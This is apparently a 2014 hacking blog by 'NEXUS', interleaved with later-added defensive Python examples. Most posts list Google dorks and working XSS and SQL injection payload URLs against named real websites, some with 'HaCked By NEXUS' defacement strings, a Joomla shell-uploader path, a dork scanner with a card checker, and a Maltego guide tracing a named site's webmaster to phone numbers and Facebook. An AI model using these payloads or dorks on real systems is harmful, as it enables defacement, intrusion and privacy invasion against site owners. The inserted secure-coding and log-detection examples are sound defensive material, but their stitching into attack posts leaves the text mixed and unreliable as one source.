Friday, 25 July 2014

[PHP] Metasploit Pro (Trial) License Grabber




[Kali Linux] How to Fix "Unable to locate package"








Do you ever see something like this when you are about to install something?


E: Unable to locate package...

Here is the solution: download the sources.list below and place it in /etc/apt/, replacing the old one with the one you have downloaded.


Permission denied?
If you cannot copy and paste sources.list into that directory even as root, type this in the terminal:

Code:
sudo nautilus

You will be prompted for your password. Enter it and try copying the file into the directory again.

What's next?
After replacing sources.list, open your terminal and run these commands:

Code:
sudo apt-get update
Code:
sudo apt-get -f install


After you have completed all of these steps, you can install packages again.
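One caveat before doing this: apt will fetch and install packages from whatever repositories the new sources.list names, so a file downloaded from a blog should be read before it replaces the system one. The script below is an added example, not part of the original post and not the file it links to. It parses the deb/deb-src lines and flags entries that point at a host other than the one you expect (http.kali.org is assumed here to be that host), entries with no components, and entries that switch off signature checking with [trusted=yes]. The function names and the sample file contents are this example's own.

```python
"""Check a downloaded sources.list before it goes into /etc/apt/.

Added example, not from the original post and not the file it links to.
It parses the one-line sources.list format (deb / deb-src, optional
[options], URI, suite, components) and reports entries that look wrong.
The sample contents and the allowlist below are constructed.
"""
import re
from urllib.parse import urlparse

# One-line format: deb|deb-src [options] URI suite [component ...]
SOURCE_LINE = re.compile(
    r"^(?P<type>deb|deb-src)\s+"
    r"(?:\[(?P<opts>[^\]]*)\]\s+)?"
    r"(?P<uri>\S+)\s+(?P<suite>\S+)(?P<comps>(?:\s+\S+)*)\s*$"
)


def parse_sources_list(text):
    """Return (entries, bad_lines): parsed entries and (lineno, text) of lines that did not parse."""
    entries, bad_lines = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments are fine
        m = SOURCE_LINE.match(line)
        if not m:
            bad_lines.append((lineno, raw))
            continue
        entries.append({
            "lineno": lineno,
            "type": m.group("type"),
            "options": (m.group("opts") or "").split(),
            "uri": m.group("uri"),
            "host": (urlparse(m.group("uri")).hostname or "").lower(),
            "suite": m.group("suite"),
            "components": m.group("comps").split(),
        })
    return entries, bad_lines


def check_sources_list(text, allowed_hosts):
    """Return a list of findings (strings). An empty list means every entry looks as expected."""
    entries, bad_lines = parse_sources_list(text)
    findings = [f"line {n}: not a valid sources line: {t!r}" for n, t in bad_lines]
    for e in entries:
        if e["host"] not in allowed_hosts:
            findings.append(f"line {e['lineno']}: unexpected repository host {e['host']!r} in {e['uri']}")
        if not e["components"]:
            findings.append(f"line {e['lineno']}: no components listed for suite {e['suite']!r}")
        if "trusted=yes" in e["options"]:
            findings.append(f"line {e['lineno']}: [trusted=yes] disables signature checks for {e['uri']}")
    if not entries:
        findings.append("no active deb/deb-src entries at all")
    return findings


ALLOWED_HOSTS = {"http.kali.org"}  # assumption: the host you expect your packages to come from

SAMPLE_GOOD = """\
# constructed sample, not the file from the post
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
"""

SAMPLE_BAD = """\
deb http://http.kali.org/kali kali main
deb [trusted=yes] http://mirror.example.invalid/kali kali main
deb http://http.kali.org/kali kali
this is not a sources line
"""

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_BAD
    for finding in check_sources_list(text, ALLOWED_HOSTS) or ["no findings"]:
        print(finding)
```

Run it as `python check_sources.py /path/to/downloaded/sources.list`; with no argument it checks the built-in bad sample. Only when it prints no findings does the apt-get update step make sense.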

Thursday, 24 July 2014

[Kali Linux] Maltego - Infrastructure Information Gathering








In this tutorial, I'm going to show you how to gather information using Maltego in Kali Linux.

Firstly, open up Maltego.


Applications>Kali Linux>Top 10 Security Tools>Maltego





If this is your first time using it, you need to complete the registration. Once the registration is complete, click on the menu button and select New.




A blank screen will appear. Next, click on Palette. In this tutorial I'm going to show how to gather information about infrastructure, so click Infrastructure and drag and drop "Domain" into your project.




You will see an earth icon with a domain name. Double click on it and change the domain name to your target. In this tutorial, my target is www.papagomo.com




Close that window and let's start gathering information. Right click on the earth icon, choose Run Transform, then All Transforms, followed by the transform of your choice. In this case, I will use To Phone Number [using Search Engine].




If results are found, it will produce output like this picture. If nothing appears, that means no results were found.




There are 4 phone numbers, but that doesn't mean all of them belong to the webmaster; still, you can give it a try. Now I'm going to use a phone number to get more information, so I will transform the phone number into a URL.




After I transformed it into a URL using a search engine, I got a Facebook page. Maybe it belongs to the phone number's owner and the webmaster.





I think that's all for now. I hope you understand how to use Maltego. 

Saturday, 12 July 2014

[SQLi-DB] SQLi Dork Scanner





SQLi-DB is a SQL injection dork scanner. The scanner was coded in C# by RieqyNS13 from Indonesia, and it was recoded and rearranged by K3RAMA7. He based it on the theme of the famous defacement mirror, HACK-DB.

Features:
- Multiple search engines
- Auto-rotating proxy
- Deep scan
- CC checker

Using it is very easy: simply paste your SQLi dork into the search column and click the search icon, and you will see the scanning results.




Sunday, 6 July 2014

[XSS] noname-media

Dork:
intext:"powered by www.noname-media.com" inurl:"/view.php?id="

Exploit:
/view.php?id=

Live Demo:
http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring
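Every "exploit" in posts like the one above is the same defect: a PHP page such as view.php?id= echoes a query parameter into its HTML without encoding it, so a value ending in "> closes the attribute and whatever follows is rendered as markup. The snippet below is an added example written in Python as a stand-in for that PHP handler; it is not code from the post or from the affected CMS. It shows the vulnerable rendering next to the two fixes that close it: validating that id is an integer before use, and HTML-encoding anything that is reflected. The names render_unsafe, render_safe, parse_id and handle_request are this example's own.

```python
"""Reflected XSS in a view.php?id= style page: vulnerable vs hardened rendering.

Added example, not code from the original post or from any of the CMSs it
lists. It models in Python what a PHP page does when it echoes a query
parameter back into HTML, and the two fixes: validate the parameter's type
before use, and HTML-encode anything that is reflected.
"""
import html
import re

# The parameter is reflected twice: in a link and in an input's value attribute.
PAGE_TEMPLATE = '<a href="view.php?id={id}&next=1">Next</a><input name="id" value="{id}">'


def render_unsafe(id_value):
    """The bug: the raw query-string value is concatenated into HTML, so a value
    containing  "><script>  closes the attribute and injects markup."""
    return PAGE_TEMPLATE.format(id=id_value)


def render_safe(id_value):
    """Fix 1 (output encoding): html.escape with quote=True turns < > & " ' into
    entities, so the value can no longer break out of the attribute or start a tag."""
    return PAGE_TEMPLATE.format(id=html.escape(str(id_value), quote=True))


ID_PATTERN = re.compile(r"^[0-9]{1,10}$")


def parse_id(raw):
    """Fix 2 (input validation): ids in this kind of page are integers, so reject
    anything else before it reaches a template or a SQL query. Returns int or None."""
    if raw is None or not ID_PATTERN.match(raw):
        return None
    return int(raw)


def handle_request(query_id):
    """A request handler combining both fixes: validate first, then encode on output.
    Returns (http_status, body)."""
    id_value = parse_id(query_id)
    if id_value is None:
        # Do not reflect the rejected value back into the error page either.
        return 400, "<p>Invalid id.</p>"
    return 200, render_safe(id_value)


# Constructed sample of the kind of value the post's demo URLs carry, URL-decoded.
PROBE = '4"><script>alert(1)</script>'

if __name__ == "__main__":
    print("unsafe:", render_unsafe(PROBE))
    print("safe:  ", render_safe(PROBE))
    print("handler:", handle_request(PROBE))
```

Output encoding alone already stops the injection; the type check is the extra layer that keeps the same parameter from reaching a SQL query unvalidated, which is why the posts that list both XSS and SQLi for one `?id=` parameter are usually describing a single missing check.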

ProActive CMS - XSS

Dork:
intext:"Powered by Proactive CMS"

Exploit:
 /admin.php?action=newuser (XSS)

Live Demo:
http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring

Joomla Collector Shell Uploader

Dork:
inurl:index.php?option=com_collector

Exploit:
 /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Live Demo:
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

 NEXUS - Sharing Is Caring

Joomla Aclassif - XSS

Dork:
inurl:"index.php?option=com_aclassif"

Exploit:
/index.php/component/aclassif/?

Example & Live Demo:
http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring

Friday, 4 July 2014

Seventeen Design XSS & SQLI

Dork:
intext:"Producido por: Seventeen Design."

Exploits:
http://site.com/*.*id= <SQLI>
http://site.com/*.*id= <XSS>

Live Demo:

SQLI + XSS:
http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring

Espacio Ecuador XSS & SQLI

Dork:
intext:"developed by Espacio Ecuador"

Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>

Live Demo:

SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


NEXUS - Sharing Is Caring

WordPress zarzadzanie_kontem Plugin

Dork:
inurl:"/wp-content/plugins/zarzadzanie_kontem/"



Live Demo:
http://kursrekodziela.pl/images/user-images/front-end/guest/2014/07/NEXUS.txt

NEXUS - Sharing Is Caring

Arwen Cross Site Scripting & SQL Injection

Dork:
intext:"website realizado por Arwen desarrollo web y diseño"

Exploits:
http://site.com/index.php?m= <SQLI>
 http://site.com/index.php?mod= < SQLI>
 http://site.com/index.php?m= <XSS>
 http://site.com/index.php?mod= <XSS>

Live Demo: 

SQLI:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%27

XSS:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:
"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:
http://www.site-web.com/***.php?id= [SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:
http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27



XSS (with HTML scripts):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E


XSS (with JavaScript):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E 


NEXUS - Sharing Is Caring

Thursday, 3 July 2014

milkshakedesign CMS - XSS Vulnerability

Dork:
intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:
 programmeview.php?pid=

Example & Live Demo:
http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E
NEXUS 

XSS Found By NEXUS !

I found all XSS in those sites :D
http://pastebin.com/fGSr5sn3
NEXUS 

mc-creation CMS - XSS Vulnerability

Dorks:
intext:"web design solution" inurl:"product_view.php?pid="
intext:"web design solution"

Exploit:
"product_view.php?pid="

Examples & Live Demos:

Testing:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E



NEXUS

Morgane CMS - XSS Vulnerability

Dorks:
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id=" 

Use string-to-char mode, or use numbers.

Example & Live Demo:

String to char mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
 http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
* The XSS runs only in Firefox, not in Google Chrome :D



NEXUS 

Tuesday, 1 July 2014

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* The "for" parameter in search.php is VULNERABLE to XSS.

Exploits:
"><script>alert('HaCked_By_NEXUS');</script>&search_submit=Search
Or, if you can't use a normal script, change it from a string to characters:
"><script>alert(String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33));</script>&search_submit=Search
These characters, "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)", spell "HaCked By NEXUS !" and were generated with Firefox's HackBar.



If you don't have HackBar, download it from:
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* The Keywords and strSearchPhrase parameters in Search.asp are vulnerable to XSS.

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&ContainerID=&forumsearchoption=topics
http://www.NEXUS.com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics

NEXUS
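From the defender's side, the "live demo" URLs collected in the posts above are also a compact catalogue of what a probe looks like in a web server's access log. The scanner below is an added example, not from any of the posts. It parses combined-log-format lines, URL-decodes every query parameter (including double encoding) and reports the parameters that carry a quote-and-> attribute breakout, a script tag or String.fromCharCode call, an inline event handler, or a lone trailing quote on a numeric id. The log lines are constructed samples using documentation IP addresses; the paths copy the shapes quoted in the posts.

```python
"""Spot reflected-XSS and SQL-injection probes in web server access logs.

Added example, not from the original posts. Parses combined log format,
URL-decodes each query parameter and matches a few indicators drawn from the
shapes of the probes quoted on the page. The log lines are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

XSS_INDICATORS = [
    ("tag_breakout", re.compile(r"[\"']\s*>\s*<")),          # "><  closes the attribute
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("fromcharcode", re.compile(r"String\.fromCharCode", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),  # onerror=, onload=, ...
]
SQLI_INDICATORS = [
    ("trailing_quote", re.compile(r"^\d+['\"]\s*$")),        # id=61712'
    ("sql_keyword", re.compile(r"\b(union|select|sleep|benchmark)\b", re.I)),
]


def fully_decode(value, rounds=3):
    """parse_qsl already decoded once; keep decoding to catch double-encoded probes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target):
    """Return one finding per suspicious query parameter of a request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        xss = [label for label, rx in XSS_INDICATORS if rx.search(value)]
        sqli = [label for label, rx in SQLI_INDICATORS if rx.search(value)]
        if xss or sqli:
            findings.append({"param": name, "xss": xss, "sqli": sqli})
    return findings


def scan_log(lines):
    """Run analyse_target over each parseable log line; attach client IP, path and status."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for f in analyse_target(m.group("target")):
            alerts.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                **f,
            })
    return alerts


SAMPLE_LOG = [
    # constructed samples (RFC 5737 documentation addresses); paths shaped like the posts' demos
    '203.0.113.5 - - [06/Jul/2014:14:02:11 +0000] "GET /php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C97%29%29%3B%3C/script%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Jul/2014:14:02:40 +0000] "GET /exibe.php?id=61712%27 HTTP/1.1" 500 221 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Jul/2014:14:03:02 +0000] "GET /exibe.php?id=231&busca=%22%3E%3Cimg%20src=x%20onerror=alert%281%29%3E HTTP/1.1" 200 4099 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [06/Jul/2014:14:05:00 +0000] "GET /view.php?id=4&next=1 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
    'garbage that is not a log line',
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ip']} {a['path']} status={a['status']} param={a['param']} xss={a['xss']} sqli={a['sqli']}")
```

A 500 next to a trailing-quote probe (the second sample line) is the pattern worth alerting on first: it suggests the quote reached a query rather than being rejected, which is exactly what the posts' SQLi demos rely on.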